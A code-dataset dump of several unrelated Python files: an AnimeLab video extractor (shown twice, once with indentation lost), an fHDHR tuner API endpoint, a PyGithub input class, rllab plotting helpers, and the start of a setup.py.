            season_id = str_or_none(season_data.get('id'))

            for video_data in raw_data['videoList']:
                # Common fields shared by every instance of this video entry.
                current_video_list = {}
                current_video_list['language'] = video_data.get('language', {}).get('languageCode')

                is_hardsubbed = video_data.get('hardSubbed')

                for video_instance in video_data['videoInstances']:
                    # Prefer the HTTP URL; fall back to RTMP when absent.
                    httpurl = video_instance.get('httpUrl')
                    url = httpurl if httpurl else video_instance.get('rtmpUrl')
                    if url is None:
                        # this video format is unavailable to the user (not premium etc.)
                        continue

                    current_format = current_video_list.copy()
                    format_id_parts = []

                    format_id_parts.append(str_or_none(video_instance.get('id')))

                    if is_hardsubbed is not None:
                        if is_hardsubbed:
                            format_id_parts.append('yeshardsubbed')
                        else:
                            format_id_parts.append('nothardsubbed')

                    format_id_parts.append(current_format['language'])

                    # e.g. "21711_yeshardsubbed_ja-JP"; None parts are dropped.
                    format_id = '_'.join([x for x in format_id_parts if x is not None])

                    ext = determine_ext(url)
                    # Manifest URLs expand into several formats of their own;
                    # merge those into the dict and skip the manual path below.
                    if ext == 'm3u8':
                        for format_ in self._extract_m3u8_formats(
                                url, video_id, m3u8_id=format_id, fatal=False):
                            formats[format_['format_id']] = format_
                        continue
                    elif ext == 'mpd':
                        for format_ in self._extract_mpd_formats(
                                url, video_id, mpd_id=format_id, fatal=False):
                            formats[format_['format_id']] = format_
                        continue

                    current_format['url'] = url
                    quality_data = video_instance.get('videoQuality')
                    if quality_data:
                        quality = quality_data.get('name') or quality_data.get('description')
                    else:
                        quality = None

                    # Parse the height out of quality labels like "480p".
                    height = None
                    if quality:
                        height = int_or_none(self._search_regex(r'(\d+)p?$', quality, 'Video format height', default=None))

                    if height is None:
                        self.report_warning('Could not get height of video')
                    else:
                        current_format['height'] = height
                    current_format['format_id'] = format_id

                    formats[current_format['format_id']] = current_format

        formats = list(formats.values())
        self._sort_formats(formats)

        return {
            'id': video_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'series': series,
            'episode': episode_name,
            'episode_number': int_or_none(episode_number),
            'thumbnails': thumbnails,
            'duration': duration,
            'formats': formats,
            'season': season,
            'season_number': season_number,
            'season_id': season_id,
        }
class AnimeLabShowsIE(AnimeLabBaseIE):
    """Extractor for AnimeLab show pages, yielding one playlist per show."""

    _VALID_URL = r'https?://(?:www\.)?animelab\.com/shows/(?P<id>[^/]+)'

    _TEST = {
        'url': 'https://www.animelab.com/shows/attack-on-titan',
        'info_dict': {
            'id': '45',
            'title': 'Attack on Titan',
            'description': 'md5:989d95a2677e9309368d5cf39ba91469',
        },
        'playlist_count': 59,
        'skip': 'All AnimeLab content requires authentication',
    }

    def _real_extract(self, url):
        base_url = 'http://www.animelab.com'
        shows_api_path = '/api/videoentries/show/videos/'

        display_id = self._match_id(url)
        webpage = self._download_webpage(url, display_id, 'Downloading requested URL')

        # The show metadata is embedded as a JSON blob in the page source.
        show_data = self._parse_json(self._search_regex(
            r'({"id":.*}),\svideoEntry', webpage, 'AnimeLab show data'), display_id)
        show_id = str_or_none(show_data.get('id'))

        entries = []
        for season in show_data['seasons']:
            season_id = season['id']
            # despite using urlencode_postdata, we are sending a GET request
            query = urlencode_postdata({
                'seasonId': season_id,
                'limit': 1000,
            }).decode('utf-8')
            season_page = self._download_webpage(
                base_url + shows_api_path + show_id + "?" + query,
                None, 'Season id %s' % season_id)
            season_data = self._parse_json(season_page, display_id)
            for video_data in season_data['list']:
                entries.append(self.url_result(
                    base_url + '/player/' + video_data['slug'], 'AnimeLab',
                    str_or_none(video_data.get('id')), video_data.get('name')
                ))

        return {
            '_type': 'playlist',
            'id': show_id,
            'title': show_data.get('name'),
            'description': show_data.get('shortSynopsis') or show_data.get('longSynopsis'),
            'entries': entries,
        }
# TODO implement myqueue
| 40.168459 | 170 | 0.563309 |
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
int_or_none,
str_or_none,
determine_ext,
)
from ..compat import compat_HTTPError
class AnimeLabBaseIE(InfoExtractor):
_LOGIN_URL = 'https://www.animelab.com/login'
_NETRC_MACHINE = 'animelab'
_LOGGED_IN = False
def _is_logged_in(self, login_page=None):
if not self._LOGGED_IN:
if not login_page:
login_page = self._download_webpage(self._LOGIN_URL, None, 'Downloading login page')
AnimeLabBaseIE._LOGGED_IN = 'Sign In' not in login_page
return self._LOGGED_IN
def _perform_login(self, username, password):
if self._is_logged_in():
return
login_form = {
'email': username,
'password': password,
}
try:
response = self._download_webpage(
self._LOGIN_URL, None, 'Logging in', 'Wrong login info',
data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 400:
raise ExtractorError('Unable to log in (wrong credentials?)', expected=True)
raise
if not self._is_logged_in(response):
raise ExtractorError('Unable to login (cannot verify if logged in)')
def _real_initialize(self):
if not self._is_logged_in():
self.raise_login_required('Login is required to access any AnimeLab content')
class AnimeLabIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/player/(?P<id>[^/]+)'
_TEST = {
'url': 'https://www.animelab.com/player/fullmetal-alchemist-brotherhood-episode-42',
'md5': '05bde4b91a5d1ff46ef5b94df05b0f7f',
'info_dict': {
'id': '383',
'ext': 'mp4',
'display_id': 'fullmetal-alchemist-brotherhood-episode-42',
'title': 'Fullmetal Alchemist: Brotherhood - Episode 42 - Signs of a Counteroffensive',
'description': 'md5:103eb61dd0a56d3dfc5dbf748e5e83f4',
'series': 'Fullmetal Alchemist: Brotherhood',
'episode': 'Signs of a Counteroffensive',
'episode_number': 42,
'duration': 1469,
'season': 'Season 1',
'season_number': 1,
'season_id': '38',
},
'params': {
'format': '[format_id=21711_yeshardsubbed_ja-JP][height=480]',
},
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
display_id = self._match_id(url)
formats = {}
for language_option_url in ('https://www.animelab.com/player/%s/subtitles',
'https://www.animelab.com/player/%s/dubbed'):
actual_url = language_option_url % display_id
webpage = self._download_webpage(actual_url, display_id, 'Downloading URL ' + actual_url)
video_collection = self._parse_json(self._search_regex(r'new\s+?AnimeLabApp\.VideoCollection\s*?\((.*?)\);', webpage, 'AnimeLab VideoCollection'), display_id)
position = int_or_none(self._search_regex(r'playlistPosition\s*?=\s*?(\d+)', webpage, 'Playlist Position'))
raw_data = video_collection[position]['videoEntry']
video_id = str_or_none(raw_data['id'])
series = raw_data.get('showTitle')
video_type = raw_data.get('videoEntryType', {}).get('name')
episode_number = raw_data.get('episodeNumber')
episode_name = raw_data.get('name')
title_parts = (series, video_type, episode_number, episode_name)
if None not in title_parts:
title = '%s - %s %s - %s' % title_parts
else:
title = episode_name
description = raw_data.get('synopsis') or self._og_search_description(webpage, default=None)
duration = int_or_none(raw_data.get('duration'))
thumbnail_data = raw_data.get('images', [])
thumbnails = []
for thumbnail in thumbnail_data:
for instance in thumbnail['imageInstances']:
image_data = instance.get('imageInfo', {})
thumbnails.append({
'id': str_or_none(image_data.get('id')),
'url': image_data.get('fullPath'),
'width': image_data.get('width'),
'height': image_data.get('height'),
})
season_data = raw_data.get('season', {}) or {}
season = str_or_none(season_data.get('name'))
season_number = int_or_none(season_data.get('seasonNumber'))
season_id = str_or_none(season_data.get('id'))
for video_data in raw_data['videoList']:
current_video_list = {}
current_video_list['language'] = video_data.get('language', {}).get('languageCode')
is_hardsubbed = video_data.get('hardSubbed')
for video_instance in video_data['videoInstances']:
httpurl = video_instance.get('httpUrl')
url = httpurl if httpurl else video_instance.get('rtmpUrl')
if url is None:
continue
current_format = current_video_list.copy()
format_id_parts = []
format_id_parts.append(str_or_none(video_instance.get('id')))
if is_hardsubbed is not None:
if is_hardsubbed:
format_id_parts.append('yeshardsubbed')
else:
format_id_parts.append('nothardsubbed')
format_id_parts.append(current_format['language'])
format_id = '_'.join([x for x in format_id_parts if x is not None])
ext = determine_ext(url)
if ext == 'm3u8':
for format_ in self._extract_m3u8_formats(
url, video_id, m3u8_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
elif ext == 'mpd':
for format_ in self._extract_mpd_formats(
url, video_id, mpd_id=format_id, fatal=False):
formats[format_['format_id']] = format_
continue
current_format['url'] = url
quality_data = video_instance.get('videoQuality')
if quality_data:
quality = quality_data.get('name') or quality_data.get('description')
else:
quality = None
height = None
if quality:
height = int_or_none(self._search_regex(r'(\d+)p?$', quality, 'Video format height', default=None))
if height is None:
self.report_warning('Could not get height of video')
else:
current_format['height'] = height
current_format['format_id'] = format_id
formats[current_format['format_id']] = current_format
formats = list(formats.values())
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'series': series,
'episode': episode_name,
'episode_number': int_or_none(episode_number),
'thumbnails': thumbnails,
'duration': duration,
'formats': formats,
'season': season,
'season_number': season_number,
'season_id': season_id,
}
class AnimeLabShowsIE(AnimeLabBaseIE):
_VALID_URL = r'https?://(?:www\.)?animelab\.com/shows/(?P<id>[^/]+)'
_TEST = {
'url': 'https://www.animelab.com/shows/attack-on-titan',
'info_dict': {
'id': '45',
'title': 'Attack on Titan',
'description': 'md5:989d95a2677e9309368d5cf39ba91469',
},
'playlist_count': 59,
'skip': 'All AnimeLab content requires authentication',
}
def _real_extract(self, url):
_BASE_URL = 'http://www.animelab.com'
_SHOWS_API_URL = '/api/videoentries/show/videos/'
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id, 'Downloading requested URL')
show_data_str = self._search_regex(r'({"id":.*}),\svideoEntry', webpage, 'AnimeLab show data')
show_data = self._parse_json(show_data_str, display_id)
show_id = str_or_none(show_data.get('id'))
title = show_data.get('name')
description = show_data.get('shortSynopsis') or show_data.get('longSynopsis')
entries = []
for season in show_data['seasons']:
season_id = season['id']
get_data = urlencode_postdata({
'seasonId': season_id,
'limit': 1000,
})
target_url = _BASE_URL + _SHOWS_API_URL + show_id + "?" + get_data.decode('utf-8')
response = self._download_webpage(
target_url,
None, 'Season id %s' % season_id)
season_data = self._parse_json(response, display_id)
for video_data in season_data['list']:
entries.append(self.url_result(
_BASE_URL + '/player/' + video_data['slug'], 'AnimeLab',
str_or_none(video_data.get('id')), video_data.get('name')
))
return {
'_type': 'playlist',
'id': show_id,
'title': title,
'description': description,
'entries': entries,
}
| true | true |
1c2cc70c8a4b2ec67143b45dcd2223f54ae38d97 | 6,369 | py | Python | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | 2 | 2021-11-21T18:45:35.000Z | 2022-01-11T16:11:48.000Z | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | null | null | null | fHDHR_web/api/tuners.py | deathbybandaid/fHDHR_NewsOn | 06d205a3ca677b88fa93b9b7503465aed1838c6b | [
"WTFPL"
] | null | null | null | from flask import Response, request, redirect, abort, stream_with_context, session
import urllib.parse
import uuid
import json
from fHDHR.exceptions import TunerError
class Tuners():
    """fHDHR web API endpoint for tuner control, served at /api/tuners.

    The ``method`` query parameter selects the action:
      * direct/ffmpeg/vlc - grab a tuner and stream a channel to the client
      * close             - release a specific tuner
      * scan              - run a channel scan on a tuner
      * status            - report tuner status as JSON
    """

    endpoints = ["/api/tuners"]
    endpoint_name = "api_tuners"
    endpoint_methods = ["GET", "POST"]

    def __init__(self, fhdhr):
        # Shared fHDHR application object (config, logger, device access).
        self.fhdhr = fhdhr

    def __call__(self, *args):
        # Flask invokes the endpoint object directly; delegate to get().
        return self.get(*args)

    def get(self, *args):
        """Handle a tuner API request based on the ``method`` query parameter."""
        client_address = request.remote_addr
        accessed_url = request.args.get('accessed', default=request.url, type=str)
        # Default stream method comes from the fHDHR configuration.
        method = request.args.get('method', default=self.fhdhr.config.dict["fhdhr"]["stream_type"], type=str)
        tuner_number = request.args.get('tuner', None, type=str)
        redirect_url = request.args.get('redirect', default=None, type=str)

        if method in ["direct", "ffmpeg", "vlc"]:
            # --- Streaming path: validate channel, grab a tuner, stream. ---
            channel_number = request.args.get('channel', None, type=str)
            if not channel_number:
                return "Missing Channel"
            if str(channel_number) not in [str(x) for x in self.fhdhr.device.channels.get_channel_list("number")]:
                response = Response("Not Found", status=404)
                response.headers["X-fHDHR-Error"] = "801 - Unknown Channel"
                self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
                abort(response)
            channel_dict = self.fhdhr.device.channels.get_channel_dict("number", channel_number)
            if not channel_dict["enabled"]:
                response = Response("Service Unavailable", status=503)
                response.headers["X-fHDHR-Error"] = str("806 - Tune Failed")
                self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
                abort(response)
            duration = request.args.get('duration', default=0, type=int)
            transcode = request.args.get('transcode', default=None, type=str)
            valid_transcode_types = [None, "heavy", "mobile", "internet720", "internet480", "internet360", "internet240"]
            if transcode not in valid_transcode_types:
                response = Response("Service Unavailable", status=503)
                response.headers["X-fHDHR-Error"] = "802 - Unknown Transcode Profile"
                self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
                abort(response)
            # Arguments describing this stream request, passed down to the tuner.
            stream_args = {
                "channel": channel_number,
                "method": method,
                "duration": duration,
                "transcode": transcode,
                "accessed": accessed_url,
                "client": client_address,
                "client_id": str(client_address) + "_" + str(uuid.uuid4())
            }
            # Grab a specific tuner when requested, otherwise the first free one.
            try:
                if not tuner_number:
                    tunernum = self.fhdhr.device.tuners.first_available(channel_number)
                else:
                    tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, channel_number)
            except TunerError as e:
                self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
                                       % (stream_args["method"], str(stream_args["channel"]), str(e)))
                response = Response("Service Unavailable", status=503)
                response.headers["X-fHDHR-Error"] = str(e)
                self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
                abort(response)
            tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
            # Resolve the actual stream details; release the tuner on failure.
            try:
                stream_args = self.fhdhr.device.tuners.get_stream_info(stream_args)
            except TunerError as e:
                self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
                                       % (stream_args["method"], str(stream_args["channel"]), str(e)))
                response = Response("Service Unavailable", status=503)
                response.headers["X-fHDHR-Error"] = str(e)
                self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
                tuner.close()
                abort(response)
            self.fhdhr.logger.info("Tuner #" + str(tunernum) + " to be used for stream.")
            tuner.set_status(stream_args)
            session["tuner_used"] = tunernum
            # "direct" passes raw bytes through; ffmpeg/vlc stream generator output.
            if stream_args["method"] == "direct":
                return Response(tuner.get_stream(stream_args, tuner), content_type=stream_args["content_type"], direct_passthrough=True)
            elif stream_args["method"] in ["ffmpeg", "vlc"]:
                return Response(stream_with_context(tuner.get_stream(stream_args, tuner)), mimetype=stream_args["content_type"])
        elif method == "close":
            # --- Release a specific tuner. ---
            if not tuner_number or str(tuner_number) not in list(self.fhdhr.device.tuners.tuners.keys()):
                return "%s Invalid tuner" % str(tuner_number)
            session["tuner_used"] = tuner_number
            tuner = self.fhdhr.device.tuners.tuners[str(tuner_number)]
            tuner.close()
        elif method == "scan":
            # --- Run a channel scan on a grabbed tuner. ---
            if not tuner_number:
                tunernum = self.fhdhr.device.tuners.first_available(None)
            else:
                tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, None)
            tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
            tuner.channel_scan(grabbed=True)
        elif method == "status":
            # --- Report status for one tuner or all tuners as JSON. ---
            if not tuner_number:
                tuner_status = self.fhdhr.device.tuners.status()
            elif str(tuner_number) in list(self.fhdhr.device.tuners.tuners.keys()):
                tuner_status = self.fhdhr.device.tuners.tuners[str(tuner_number)].get_status()
            else:
                tuner_status = ["Invalid Tuner %s" % tuner_number]
            tuner_status_json = json.dumps(tuner_status, indent=4)
            return Response(status=200,
                            response=tuner_status_json,
                            mimetype='application/json')
        else:
            return "%s Invalid Method" % method
        # close/scan fall through here; optionally bounce back to the caller page.
        if redirect_url:
            return redirect(redirect_url + "?retmessage=" + urllib.parse.quote("%s Success" % method))
        else:
            return "%s Success" % method
| 43.326531 | 136 | 0.576857 | from flask import Response, request, redirect, abort, stream_with_context, session
import urllib.parse
import uuid
import json
from fHDHR.exceptions import TunerError
class Tuners():
endpoints = ["/api/tuners"]
endpoint_name = "api_tuners"
endpoint_methods = ["GET", "POST"]
def __init__(self, fhdhr):
self.fhdhr = fhdhr
def __call__(self, *args):
return self.get(*args)
def get(self, *args):
client_address = request.remote_addr
accessed_url = request.args.get('accessed', default=request.url, type=str)
method = request.args.get('method', default=self.fhdhr.config.dict["fhdhr"]["stream_type"], type=str)
tuner_number = request.args.get('tuner', None, type=str)
redirect_url = request.args.get('redirect', default=None, type=str)
if method in ["direct", "ffmpeg", "vlc"]:
channel_number = request.args.get('channel', None, type=str)
if not channel_number:
return "Missing Channel"
if str(channel_number) not in [str(x) for x in self.fhdhr.device.channels.get_channel_list("number")]:
response = Response("Not Found", status=404)
response.headers["X-fHDHR-Error"] = "801 - Unknown Channel"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
channel_dict = self.fhdhr.device.channels.get_channel_dict("number", channel_number)
if not channel_dict["enabled"]:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str("806 - Tune Failed")
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
duration = request.args.get('duration', default=0, type=int)
transcode = request.args.get('transcode', default=None, type=str)
valid_transcode_types = [None, "heavy", "mobile", "internet720", "internet480", "internet360", "internet240"]
if transcode not in valid_transcode_types:
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = "802 - Unknown Transcode Profile"
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
stream_args = {
"channel": channel_number,
"method": method,
"duration": duration,
"transcode": transcode,
"accessed": accessed_url,
"client": client_address,
"client_id": str(client_address) + "_" + str(uuid.uuid4())
}
try:
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(channel_number)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, channel_number)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
abort(response)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
try:
stream_args = self.fhdhr.device.tuners.get_stream_info(stream_args)
except TunerError as e:
self.fhdhr.logger.info("A %s stream request for channel %s was rejected due to %s"
% (stream_args["method"], str(stream_args["channel"]), str(e)))
response = Response("Service Unavailable", status=503)
response.headers["X-fHDHR-Error"] = str(e)
self.fhdhr.logger.error(response.headers["X-fHDHR-Error"])
tuner.close()
abort(response)
self.fhdhr.logger.info("Tuner #" + str(tunernum) + " to be used for stream.")
tuner.set_status(stream_args)
session["tuner_used"] = tunernum
if stream_args["method"] == "direct":
return Response(tuner.get_stream(stream_args, tuner), content_type=stream_args["content_type"], direct_passthrough=True)
elif stream_args["method"] in ["ffmpeg", "vlc"]:
return Response(stream_with_context(tuner.get_stream(stream_args, tuner)), mimetype=stream_args["content_type"])
elif method == "close":
if not tuner_number or str(tuner_number) not in list(self.fhdhr.device.tuners.tuners.keys()):
return "%s Invalid tuner" % str(tuner_number)
session["tuner_used"] = tuner_number
tuner = self.fhdhr.device.tuners.tuners[str(tuner_number)]
tuner.close()
elif method == "scan":
if not tuner_number:
tunernum = self.fhdhr.device.tuners.first_available(None)
else:
tunernum = self.fhdhr.device.tuners.tuner_grab(tuner_number, None)
tuner = self.fhdhr.device.tuners.tuners[str(tunernum)]
tuner.channel_scan(grabbed=True)
elif method == "status":
if not tuner_number:
tuner_status = self.fhdhr.device.tuners.status()
elif str(tuner_number) in list(self.fhdhr.device.tuners.tuners.keys()):
tuner_status = self.fhdhr.device.tuners.tuners[str(tuner_number)].get_status()
else:
tuner_status = ["Invalid Tuner %s" % tuner_number]
tuner_status_json = json.dumps(tuner_status, indent=4)
return Response(status=200,
response=tuner_status_json,
mimetype='application/json')
else:
return "%s Invalid Method" % method
if redirect_url:
return redirect(redirect_url + "?retmessage=" + urllib.parse.quote("%s Success" % method))
else:
return "%s Success" % method
| true | true |
1c2cc77d829397c44bab480b94841a27a072d9a0 | 2,969 | py | Python | env/Lib/site-packages/github/InputFileContent.py | nitish21/fork-repo-app | 78992f061c0e5e46f95858df0fbf8478d1a5c716 | [
"MIT"
] | 1 | 2020-08-13T12:21:56.000Z | 2020-08-13T12:21:56.000Z | env/Lib/site-packages/github/InputFileContent.py | nitish21/fork-repo-app | 78992f061c0e5e46f95858df0fbf8478d1a5c716 | [
"MIT"
] | 6 | 2020-12-17T09:37:03.000Z | 2020-12-18T04:42:23.000Z | venv/lib/python3.7/site-packages/github/InputFileContent.py | bhaving07/pyup | 17ad21a2957c5cce91ad0cf5f75853a3182806d2 | [
"MIT"
] | 1 | 2020-08-13T12:21:58.000Z | 2020-08-13T12:21:58.000Z | # -*- coding: utf-8 -*-
############################ Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2014 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2016 Peter Buckley <dx-pbuckley@users.noreply.github.com> #
# Copyright 2018 Wan Liuyang <tsfdye@gmail.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import github.GithubObject
class InputFileContent(object):
"""
This class represents InputFileContents
"""
def __init__(self, content, new_name=github.GithubObject.NotSet):
"""
:param content: string
:param new_name: string
"""
assert isinstance(content, str), content
assert new_name is github.GithubObject.NotSet or isinstance(
new_name, str
), new_name
self.__newName = new_name
self.__content = content
@property
def _identity(self):
identity = {
"content": self.__content,
}
if self.__newName is not github.GithubObject.NotSet:
identity["filename"] = self.__newName
return identity
| 49.483333 | 80 | 0.453351 | true | true | |
1c2cc85e2a3657c90e7a5b9afc08c030f80a0c7c | 3,447 | py | Python | plots/plot_utils_mb.py | jackwilkinson255/mbmpo_master | e9e0eaf542c7895764dcb0bfee28752818124ff2 | [
"MIT"
] | 28 | 2018-11-15T14:14:23.000Z | 2022-01-10T01:53:43.000Z | plots/plot_utils_mb.py | hongzimao/model_ensemble_meta_learning | 8b1351df94dfe530efaff1118022315c8d877774 | [
"MIT"
] | 3 | 2019-05-05T23:39:01.000Z | 2021-06-15T15:28:06.000Z | plots/plot_utils_mb.py | hongzimao/model_ensemble_meta_learning | 8b1351df94dfe530efaff1118022315c8d877774 | [
"MIT"
] | 14 | 2018-11-15T16:47:02.000Z | 2021-05-28T14:58:01.000Z | import numpy as np
from rllab.misc.ext import flatten
from pprint import pprint
from collections import OrderedDict, defaultdict
def filter(exps_data, filters={}):
print("before filtering", len(exps_data), 'exps')
keep_array = []
if filters:
for i, exp in enumerate(exps_data):
keep_array.append(all([((filter_key not in exp['flat_params']) or ((filter_key in exp['flat_params']) and (exp['flat_params'][filter_key] == filter_val)))
for filter_key, filter_val in filters.items()]))
exps_data_filtered = np.array(exps_data)
exps_data_filtered = exps_data_filtered[keep_array]
else:
exps_data_filtered = exps_data
print("after filtering", len(exps_data_filtered), 'exps')
return exps_data_filtered
def group_by(exp_data, group_by_key=None):
split_dict = OrderedDict()
for exp in exp_data:
if group_by_key == 'exp_name':
exp['flat_params']['exp_name'] = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(exp['flat_params'][group_by_key]).split('_')[2]
if key_str == 'maml':
key_str = 'ours'
elif key_str == 'mpc':
key_str = 'mb-mpc'
elif key_str == 'train':
key_str = 'me-trpo'
elif group_by_key == 'env.$class':
key_str = str(exp['flat_params'][group_by_key]).split('.')[-1]
if key_str[-13:] == 'EnvRandParams':
key_str = key_str[:-13]
elif key_str[-15:] == 'EnvRandomParams':
key_str = key_str[:-15] + '2D'
else:
key_str = key_str[:-3]
else:
key_str = str(exp['flat_params'][group_by_key])
if key_str in split_dict.keys():
split_dict[key_str].append(exp)
else:
split_dict[key_str] = [exp]
return split_dict
def prepare_data_for_plot(exp_data, x_key='n_timesteps', y_key=None, sup_y_key=None, round_x=None):
x_y_tuples = []
for exp in exp_data:
name = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(name).split('_')[2]
if key_str == 'maml':
off_set = (exp['progress'][x_key][1] - exp['progress'][x_key][0])/2
else:
off_set = 0
if sup_y_key is not None:
assert type(sup_y_key) is list
for key in sup_y_key:
if key in exp['progress'].keys():
x_y_tuples.extend(list(zip(exp['progress'][x_key]-off_set, exp['progress'][key])))
break
else:
x_y_tuples.extend(list(zip(exp['progress'][x_key], exp['progress'][y_key])))
x_y_dict = defaultdict(list)
for k, v in x_y_tuples:
if round_x is not None:
x_y_dict[(k//round_x) * round_x].append(v)
else:
x_y_dict[k].append(v)
means, stddevs = [], []
for key in sorted(x_y_dict.keys()):
means.append(np.mean(x_y_dict[key]))
stddevs.append(np.std(x_y_dict[key]))
return np.array(sorted(x_y_dict.keys())), np.array(means), np.array(stddevs)
def correct_limit(ax, x, y):
# ax: axes object handle
# x: data for entire x-axes
# y: data for entire y-axes
# assumption: you have already set the x-limit as desired
lims = ax.get_xlim()
i = np.where((x > lims[0]) & (x < lims[1]))[0]
return y[i].min(), y[i].max()
| 40.552941 | 166 | 0.575573 | import numpy as np
from rllab.misc.ext import flatten
from pprint import pprint
from collections import OrderedDict, defaultdict
def filter(exps_data, filters={}):
print("before filtering", len(exps_data), 'exps')
keep_array = []
if filters:
for i, exp in enumerate(exps_data):
keep_array.append(all([((filter_key not in exp['flat_params']) or ((filter_key in exp['flat_params']) and (exp['flat_params'][filter_key] == filter_val)))
for filter_key, filter_val in filters.items()]))
exps_data_filtered = np.array(exps_data)
exps_data_filtered = exps_data_filtered[keep_array]
else:
exps_data_filtered = exps_data
print("after filtering", len(exps_data_filtered), 'exps')
return exps_data_filtered
def group_by(exp_data, group_by_key=None):
split_dict = OrderedDict()
for exp in exp_data:
if group_by_key == 'exp_name':
exp['flat_params']['exp_name'] = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(exp['flat_params'][group_by_key]).split('_')[2]
if key_str == 'maml':
key_str = 'ours'
elif key_str == 'mpc':
key_str = 'mb-mpc'
elif key_str == 'train':
key_str = 'me-trpo'
elif group_by_key == 'env.$class':
key_str = str(exp['flat_params'][group_by_key]).split('.')[-1]
if key_str[-13:] == 'EnvRandParams':
key_str = key_str[:-13]
elif key_str[-15:] == 'EnvRandomParams':
key_str = key_str[:-15] + '2D'
else:
key_str = key_str[:-3]
else:
key_str = str(exp['flat_params'][group_by_key])
if key_str in split_dict.keys():
split_dict[key_str].append(exp)
else:
split_dict[key_str] = [exp]
return split_dict
def prepare_data_for_plot(exp_data, x_key='n_timesteps', y_key=None, sup_y_key=None, round_x=None):
x_y_tuples = []
for exp in exp_data:
name = exp['flat_params']['exp_name'].replace('-', '_')
key_str = str(name).split('_')[2]
if key_str == 'maml':
off_set = (exp['progress'][x_key][1] - exp['progress'][x_key][0])/2
else:
off_set = 0
if sup_y_key is not None:
assert type(sup_y_key) is list
for key in sup_y_key:
if key in exp['progress'].keys():
x_y_tuples.extend(list(zip(exp['progress'][x_key]-off_set, exp['progress'][key])))
break
else:
x_y_tuples.extend(list(zip(exp['progress'][x_key], exp['progress'][y_key])))
x_y_dict = defaultdict(list)
for k, v in x_y_tuples:
if round_x is not None:
x_y_dict[(k//round_x) * round_x].append(v)
else:
x_y_dict[k].append(v)
means, stddevs = [], []
for key in sorted(x_y_dict.keys()):
means.append(np.mean(x_y_dict[key]))
stddevs.append(np.std(x_y_dict[key]))
return np.array(sorted(x_y_dict.keys())), np.array(means), np.array(stddevs)
def correct_limit(ax, x, y):
lims = ax.get_xlim()
i = np.where((x > lims[0]) & (x < lims[1]))[0]
return y[i].min(), y[i].max()
| true | true |
1c2cc94600336b641b10100f3b693833a810a703 | 2,298 | py | Python | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 27 | 2015-11-28T21:24:45.000Z | 2022-03-04T17:13:04.000Z | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 36 | 2016-08-23T19:17:00.000Z | 2022-03-04T15:48:37.000Z | setup.py | H-Shay/python-canonicaljson | b28486228619e10530edead41ba59be50bd7aad1 | [
"Apache-2.0"
] | 12 | 2016-04-07T10:06:23.000Z | 2022-02-28T12:30:35.000Z | #!/usr/bin/env python
# Copyright 2015 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
